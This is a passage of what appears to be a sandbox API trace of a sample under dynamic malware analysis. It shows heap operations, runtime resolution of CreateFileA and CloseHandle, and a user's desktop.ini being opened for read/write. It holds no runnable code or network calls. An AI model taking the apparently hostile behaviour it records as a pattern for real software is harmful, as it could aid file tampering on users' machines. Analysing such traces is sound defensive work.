lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0036.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.627] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0036.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpUsedDefaultChar=0x0) returned 62 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.628] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5bb8 [0036.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=62, lpWideCharStr=0x7d5bb8, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 62 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.632] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.633] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.634] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.635] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.635] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0036.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.636] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.636] CloseHandle (hObject=0x140) returned 1 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.636] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 